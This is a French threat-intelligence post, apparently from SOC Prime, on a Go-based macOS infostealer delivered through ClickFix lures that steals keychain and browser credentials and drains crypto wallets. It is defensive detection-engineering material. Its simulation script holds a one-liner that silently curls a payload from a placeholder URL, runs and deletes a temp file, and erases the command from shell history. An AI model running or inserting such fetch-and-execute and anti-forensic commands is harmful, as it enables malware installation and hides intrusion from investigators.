SOC Prime Bias: Élevé

10 Aug 2026 17:15 UTC

Un Infostealer macOS Cible les Portefeuilles de Cryptomonnaies

Author Photo
SOC Prime Team linkedin icon Suivre
Un Infostealer macOS Cible les Portefeuilles de Cryptomonnaies
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Résumé

Un voleur macOS basé sur Go cible les utilisateurs de cryptomonnaies par le biais d’une campagne d’ingénierie sociale ClickFix. Le malware vole des identifiants sensibles des trousseaux Apple et des magasins de navigateurs, tout en ayant la capacité de vider progressivement les soldes de cryptomonnaie des portefeuilles des victimes. La chaîne d’infection commence par un profil shell script qui livre des charges utiles Mach-O spécifiques à l’architecture.

Enquête

Les analystes de Huntress ont découvert la menace lors d’une chasse rétrospective et ont identifié des composants d’un voleur spécifique à macOS qui était resté actif pendant environ trois mois. L’enquête a lié l’infrastructure de soutien au groupe Aeza, un fournisseur d’hébergement à l’abri des sanctions russes. Les chercheurs ont reconstitué la chaîne d’attaque depuis l’invite d’ingénierie sociale ClickFix initiale jusqu’à l’exécution finale de la charge utile et la communication C2.

Atténuation

Les utilisateurs doivent éviter d’interagir avec des invites CAPTCHA suspectes ou de suivre des instructions inhabituelles nécessitant l’entrée de commandes dans le Terminal. Les extensions de navigateur conçues pour restreindre les scripts malveillants, telles que NoScript, et les outils de blocage basés sur DNS comme Pi-hole peuvent aider à réduire l’exposition. Une formation complète de sensibilisation des utilisateurs axée sur l’ingénierie sociale ClickFix reste l’une des défenses les plus efficaces.

Réponse

Si une infection est détectée, le système macOS affecté doit être isolé immédiatement pour arrêter l’exfiltration de données supplémentaire ou la déplétion du portefeuille de cryptomonnaie. Les administrateurs doivent localiser et supprimer tous les binaires Mach-O malveillants et les mécanismes de persistance associés. Étant donné que le malware cible les identifiants, les mots de passe de tous les comptes accessibles depuis l’appareil compromis doivent être réinitialisés.

Flux d’Attaque

Exécution de simulation

Condition préalable : Le contrôle préalable de télémetrie et de basale doit avoir réussi.

Justification : Cette section détaille l’exécution précise de la technique de l’adversaire (TTP) conçue pour déclencher la règle de détection. Les commandes et le récit DOIVENT refléter directement les TTPs identifiés et viser à générer la télémetrie exacte attendue par la logique de détection. Des exemples abstraits ou non liés conduiront à un mauvais diagnostic.

  • Narratif et commandes de l’attaque : L’adversaire initie une escroquerie ClickFix. La victime est trompée pour exécuter une commande dans son terminal. La commande utilise curl -kFsSL pour télécharger silencieusement un script malveillant. Afin d’éviter de laisser des traces, le script s’exécute via un one-liner bash qui supprime immédiatement son propre fichier temporaire (.UlaccK). Enfin, l’attaquant exécute une commande complexe history pour supprimer chirurgicalement la commande de l’historique du shell de l’utilisateur, rendant l’attaque invisible lors d’une inspection médicolégale occasionnelle.

  • Script de test de régression :

    #!/bin/bash
    # Simulation de l'attaque Malware ClickFix macOS
    # Ce script imite les chaînes de caractères exactes requises par la règle de détection.
    
    echo "[+] Démarrage de la simulation..."
    
    # 1. Simuler le téléchargement de curl (Sélection 3)
    # 2. Simuler l'exécution de bash et la suppression immédiate (Sélection 1)
    # 3. Simuler la manipulation de l'historique (Sélection 2)
    
    # Nous combinons ces éléments en une seule ligne pour imiter le modèle comportemental
    # Remarque : Nous utilisons une URL factice pour éviter l'exécution de logiciels malveillants réels
    curl -kFsSL https://raw.githubusercontent.com/dummy/malware/main/payload.sh > /dev/null 2>&1 && bash .UlaccK && rm -f .UlaccK && history -d $(history 1 2>/dev/null | awk '{print $1}')
    
    echo "[+] Commande de simulation exécutée."
    echo "[!] Vérifiez votre SIEM pour l'alerte 'Attaque Malware qui vide les portefeuilles MacOS'."
  • Commandes de nettoyage :

    # Supprimer tout artefact laissé par la simulation
    rm -f .UlaccK
    # Remarque : La manipulation de l'historique dans le script vise à simuler l'évasion ; 
    # une restauration manuelle de l'historique peut être nécessaire pour l'utilisateur de test.